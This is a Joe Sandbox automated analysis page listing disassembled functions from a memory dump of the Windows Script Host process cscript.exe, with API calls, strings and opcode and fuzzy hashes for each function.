                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 3d3e0f0ccbe08046cfc2468e589658abb837f0e89b66af113b62d44b2ef7d46f
                                                                                                                                                                                                        • Instruction ID: e6f71845e864daf5bef548a8fb7f88e5f5a1ec30dbc4a1fe5f4c6b158567165d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d3e0f0ccbe08046cfc2468e589658abb837f0e89b66af113b62d44b2ef7d46f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C11F5B1D01209ABDB10DFB8D948ADEBBF4AB4C314F558876D806E7250E7349A44CB49
                                                                                                                                                                                                        Function 004064E0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 261comCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040DBC0: malloc.MSVCRT ref: 0040DBD8
                                                                                                                                                                                                          • Part of subcall function 0040647E: GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00406542,00001000,?,?), ref: 004064A8
                                                                                                                                                                                                          • Part of subcall function 0040647E: HeapAlloc.KERNEL32(00000000,?,00406542,00001000,?,?), ref: 004064AF
                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,00407F49,00001000,?,?), ref: 00406557
                                                                                                                                                                                                        • CoCreateInstance.OLE32(00407F49,00000000,00000017,00403BD4,00000000,?,?), ref: 00406578
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Heap$AllocCreateFromInstanceProcessStringmalloc
                                                                                                                                                                                                        • String ID: WSH$WScript
                                                                                                                                                                                                        • API String ID: 3077083409-1019903269
                                                                                                                                                                                                        • Opcode ID: 6928445d1b50afa88c3b11c99006ee605cb4f4d6420a7cd62446d7bc01ee4ea0
                                                                                                                                                                                                        • Instruction ID: 560a6986489f8629fd1b23c7dc1a4adb8787e617fdb34c779204ce88193ce0ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6928445d1b50afa88c3b11c99006ee605cb4f4d6420a7cd62446d7bc01ee4ea0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A9108B5A015159FCB14CF58D89076E77B5AF4C724F1600BAD902BB3D1CA3AAC028BD9
                                                                                                                                                                                                        Function 0040DCAA Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040DDE0,004013B4), ref: 0040DCB1
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0040DDE0,?,0040DDE0,004013B4), ref: 0040DCBA
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,0040DDE0,004013B4), ref: 0040DCC5
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0040DDE0,004013B4), ref: 0040DCCC
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: a4e493c195cb21f8b02d62d8b52a8c883863b46e5ba8f8030a377f54bf840bbc
                                                                                                                                                                                                        • Instruction ID: f21b2daa11530dd6373aecba279cdae9d77e8dccccd31750deb2530c4811e439
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4e493c195cb21f8b02d62d8b52a8c883863b46e5ba8f8030a377f54bf840bbc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BD0C932001504ABD7002FF1FC0CA993E28EB4C226F058020F34D82021CA3244618B6A
                                                                                                                                                                                                        Function 00415880 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: WScript.CreateObject
                                                                                                                                                                                                        • API String ID: 0-1366894974
                                                                                                                                                                                                        • Opcode ID: f7e36573457bb77bd60b42ef005b024f04f9a0f0ef535962e079bef0ceaa8974
                                                                                                                                                                                                        • Instruction ID: 4bd609fc3e6192f08040643ef08922931b7560f8a5c221b5b1e7214b417d8a42
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7e36573457bb77bd60b42ef005b024f04f9a0f0ef535962e079bef0ceaa8974
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46A1BE71608601DFC310DF25D881AEEB7A5AFC8324F15456EF94697390DB38EC85CB9A
                                                                                                                                                                                                        Function 0040647E Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00406542,00001000,?,?), ref: 004064A8
                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00406542,00001000,?,?), ref: 004064AF
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,00406542,00001000,?,?), ref: 0040E8CA
                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00406542,00001000,?,?), ref: 0040E8D1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 756756679-0
                                                                                                                                                                                                        • Opcode ID: 040fd4291d2b6ea4c6cd22f213d779cf871ace4c501feb3513e57c655884c377
                                                                                                                                                                                                        • Instruction ID: 3b3e1ba3c60ca2afead59e2f56a61597d75dd61d1aa69d56b43153b9227ae2f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 040fd4291d2b6ea4c6cd22f213d779cf871ace4c501feb3513e57c655884c377
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AF0F431505201EBD7245F689D08B677AA8EB04331F21C53BF20ADB2D0DA78C860871E
                                                                                                                                                                                                        Function 0040A9C0 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00419498,00418AD8,000000A0,00406E82), ref: 0040A9E8
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 0040AA06
                                                                                                                                                                                                          • Part of subcall function 0040AADC: GetUserDefaultLCID.KERNEL32 ref: 0040AAFD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalDefaultInitializeSectionUserVersion
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 340135912-0
                                                                                                                                                                                                        • Opcode ID: b122c2af105eb3dab67ecf352cf94542841c121942755b25bbd72f52c390a1fd
                                                                                                                                                                                                        • Instruction ID: 1f3f504b120a8d69de8352e7beb81f4f3034842f19eeff67aa9aa94f4de85240
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b122c2af105eb3dab67ecf352cf94542841c121942755b25bbd72f52c390a1fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC117330B48354CEDB209FA49E097DA77B0A745315F1085BED046622D0D77C0999DF2F
                                                                                                                                                                                                        Function 004068B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 166memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 004068E3
                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004068EA
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00406925
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00406930
                                                                                                                                                                                                        • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00406941
                                                                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0040696F
                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000), ref: 004069F5
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00406A10
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00406A1B
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406A28
                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00406A2F
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(null), ref: 0040E99D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Variant$ClearHeap$AllocProcess$ArrayChangeElementFreeHandleSafeStringType
                                                                                                                                                                                                        • String ID: null
                                                                                                                                                                                                        • API String ID: 253374567-634125391
                                                                                                                                                                                                        • Opcode ID: f996bf276ee35a2511a7b0e07ace298a1b850a4482f677eccf0c7de63b7fd00e
                                                                                                                                                                                                        • Instruction ID: 15a69adfb9b16d14882fb75cbcc2fff1e5f837e09cb046d0c1779e644bab93a9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f996bf276ee35a2511a7b0e07ace298a1b850a4482f677eccf0c7de63b7fd00e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4051B3716043129BC710EF64C844A5BB7E8BF85710F15893AF946F7390E738DD158BAA
                                                                                                                                                                                                        Function 0040B9F0 Relevance: 21.3, APIs: 14, Instructions: 295memoryfileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040BAA7
                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040BAAE
                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,00000001,?,00000001), ref: 0040BBA5
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000001,?,00000001), ref: 0040BBC1
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040BBFA
                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BC21
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BC5E
                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040BC65
                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,00003FFF,?,00000000,?,00000001,?,00000001), ref: 0040BCA1
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040E4D1
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040E521
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040E533
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Heap$ErrorLast$ByteCharConsoleMultiProcessWideWrite$AllocFileFreeMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 702828211-0
                                                                                                                                                                                                        • Opcode ID: 17d68a262ad0ad13c16cb3b5bd98fa0aa377b81858aefa5a553bbee259396687
                                                                                                                                                                                                        • Instruction ID: 596d1ddd5f1718502e652dfd08121a6ad3e83a279c4f5ca0c544bc886b90f8e7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17d68a262ad0ad13c16cb3b5bd98fa0aa377b81858aefa5a553bbee259396687
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27B1A675A043299BDB249B558C88BAA76B4EB04300F1045BBE919B72D1DB789D808F9D
                                                                                                                                                                                                        Function 00418450 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 298libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 004184A1
                                                                                                                                                                                                        • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,00000000,?,00000000), ref: 004184D4
                                                                                                                                                                                                        • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,?,00000000), ref: 00418512
                                                                                                                                                                                                        • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 0041853C
                                                                                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?,?,00000000), ref: 00418607
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                                                                                                                                                                        • String ID: %s\%s$MUI
                                                                                                                                                                                                        • API String ID: 1597595625-2651373239
                                                                                                                                                                                                        • Opcode ID: 8c5a93233d190e8d2c82515c0805d0cb6c25342313bf677edf95d8e15bc1bfc6
                                                                                                                                                                                                        • Instruction ID: 66b5c6eb8640beb8cce7ea1066c750ae159676fa1682e267011f5cbff90e08e0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c5a93233d190e8d2c82515c0805d0cb6c25342313bf677edf95d8e15bc1bfc6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27B15271E0026D9BCF319B258C54BEB77799B84344F0484FEEA49A7241DE388EC58B5D
                                                                                                                                                                                                        Function 00417570 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32(Options,?,?,?), ref: 0041759B
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0041755A,DisplayLogo), ref: 004175B1
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0041755A,DisplayLogo,?,00000001,?,?,004125DB,00000000,?,00000000), ref: 004175BD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharErrorLastMultiPrivateProfileWide
                                                                                                                                                                                                        • String ID: Options
                                                                                                                                                                                                        • API String ID: 1820523601-529056539
                                                                                                                                                                                                        • Opcode ID: c6f9bc35396b168c47ecb402d8a199e9ad2469b77339cf2df98bf890390a6b84
                                                                                                                                                                                                        • Instruction ID: 45ecead9bab1df625afdb0ac8a82dddc26017bb8c26eac98b514685456610749
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6f9bc35396b168c47ecb402d8a199e9ad2469b77339cf2df98bf890390a6b84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33318271506121BE9B251F6A8C0DEFB7E6DDF463B07144229B815E22D0DA788D90C6FA
                                                                                                                                                                                                        Function 004128AC Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 115registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,0000002E,00000000,00020019,?), ref: 0041292F
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00403EFE,00000000,00000000,?,00000104), ref: 00412964
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00412972
                                                                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(80000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004129D2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseEnumOpenQueryValue
                                                                                                                                                                                                        • String ID: .$Open$Open2$WSFFile$WSHFile
                                                                                                                                                                                                        • API String ID: 3984146545-2336295846
                                                                                                                                                                                                        • Opcode ID: 8bacad96530e45c068cb3ba1497a263a3a6bcef4c2649650986125610da875db
                                                                                                                                                                                                        • Instruction ID: 2c199e966a87c801c1f8a97b8d1ae79da00880ed70de3d683bf5a2082176a7ec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8bacad96530e45c068cb3ba1497a263a3a6bcef4c2649650986125610da875db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD31F6B1B1011DAFE7209B54CE49BFB76ACEF10744F2041ABF505E2180E7F89ED48A69
                                                                                                                                                                                                        Function 004078F0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 165registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000001,Enabled,00000000,?,?,?,00000000,00000001,Enabled), ref: 00407945
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,Enabled), ref: 0040FD6B
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,?,00000000,00000000), ref: 0040FD9A
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00000001,00000000,00000000,?,?,?,00000000,00000001,Enabled), ref: 0040FDDE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiQueryValueWide
                                                                                                                                                                                                        • String ID: Enabled$false
                                                                                                                                                                                                        • API String ID: 649492702-109718029
                                                                                                                                                                                                        • Opcode ID: 1ab463d1ffa90133f23adfce826a98077402707cb85254892fcb9da556682ca5
                                                                                                                                                                                                        • Instruction ID: 46cbee9f48b306dd78d0258ef6d6e9ecaa5d4ea680c57d9b12f61c1a3253aff7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ab463d1ffa90133f23adfce826a98077402707cb85254892fcb9da556682ca5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C5178B1A041199AFB349F24CD41FEB77689F05320F2043B6E615F62D1DB38AE85CA5E
                                                                                                                                                                                                        Function 0041484C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 00414930
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041493C
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00414990
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00000000), ref: 004149AE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast$AddressFreeLibraryProc
                                                                                                                                                                                                        • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                        • API String ID: 1171437518-2532474036
                                                                                                                                                                                                        • Opcode ID: 8d70539afc74f520e69f6310ba9ba90cd979cd881f28a4eb593f7a3145234b56
                                                                                                                                                                                                        • Instruction ID: 81a9f99170fcd000af032a9a6bb0c46158e7e05cdb389610e7ce67482713d238
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d70539afc74f520e69f6310ba9ba90cd979cd881f28a4eb593f7a3145234b56
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6414EB6D113299BCB11CFA9C8806DEBBB4BF84710F21412ED809BB340D7789D458B99
                                                                                                                                                                                                        Function 0040B1D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00407DA1,?,?,?,?,?,?,?), ref: 0040B1E9
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0040B1FF
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0040B216
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?), ref: 0040B2B6
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?), ref: 0041124B
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$ErrorFreeLastLoad
                                                                                                                                                                                                        • String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
                                                                                                                                                                                                        • API String ID: 1004692917-3104440107
                                                                                                                                                                                                        • Opcode ID: c2e59984b4ab170b1a6120ddab7edd5e23153710f18b4e21200bd8bc1348e5c5
                                                                                                                                                                                                        • Instruction ID: 7e4653c1a3fee452954452bc2918e8038a6612f0526473c5e9a9dfe65460cd0e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2e59984b4ab170b1a6120ddab7edd5e23153710f18b4e21200bd8bc1348e5c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03217E75900216ABC7118F98D898BAEBBB4EB44711F1481BAED09F7390DB7899408BDD
                                                                                                                                                                                                        Function 00413160 Relevance: 13.8, APIs: 9, Instructions: 335COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040C93B: memcmp.MSVCRT ref: 0040C93F
                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00413469
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0041349B
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004134A9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeString$ClearVariantmemcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1922676145-0
                                                                                                                                                                                                        • Opcode ID: b96cb0af5c2a5b21c3f0e5ab5712e65ff4d8a3a00d1936c8d4b01886c4d95c54
                                                                                                                                                                                                        • Instruction ID: 4802c415fbf222ec321ac108cc48985698185337f681291f2647af2c80b3a450
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b96cb0af5c2a5b21c3f0e5ab5712e65ff4d8a3a00d1936c8d4b01886c4d95c54
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69C1AE71E01119AFCF14DF98D884AEEBBB1FF08311F15816AE905A7350D739AE81CB98
                                                                                                                                                                                                        Function 0040B910 Relevance: 13.6, APIs: 9, Instructions: 96COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0040A6F5: LoadStringW.USER32(?,?,00000800,00000C89), ref: 0040A737
                                                                                                                                                                                                          • Part of subcall function 0040A6F5: SysAllocString.OLEAUT32(?), ref: 0040A74A
                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?), ref: 0040B978
                                                                                                                                                                                                          • Part of subcall function 0040B9F0: GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040BAA7
                                                                                                                                                                                                          • Part of subcall function 0040B9F0: HeapAlloc.KERNEL32(00000000), ref: 0040BAAE
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0040B98A
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0040B991
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0040B998
                                                                                                                                                                                                          • Part of subcall function 0040BCDF: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0040B95E,?), ref: 0040BD1E
                                                                                                                                                                                                          • Part of subcall function 0040BCDF: SysAllocString.OLEAUT32(?), ref: 0040BD2F
                                                                                                                                                                                                          • Part of subcall function 0040BCDF: LocalFree.KERNEL32(00000000,?,00000000,0040B95E,?), ref: 0040BD51
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$Free$Alloc$Heap$FormatHandleLoadLocalMessageProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1815185728-0
                                                                                                                                                                                                        • Opcode ID: b332ea6df461abc03c508f34a0d2ae6f7877696deb9b86c69f5a38ab7343fecb
                                                                                                                                                                                                        • Instruction ID: ab9d785b819f1ac0f170f09a6a3d2c002b02da18d416643fd1cc05274107659e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b332ea6df461abc03c508f34a0d2ae6f7877696deb9b86c69f5a38ab7343fecb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE316F71900209AFCF00DFA6CC848EFBBB9FF44354B10807AE905A3251DB359E51DB99
                                                                                                                                                                                                        Function 00416DDC Relevance: 12.1, APIs: 8, Instructions: 57memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
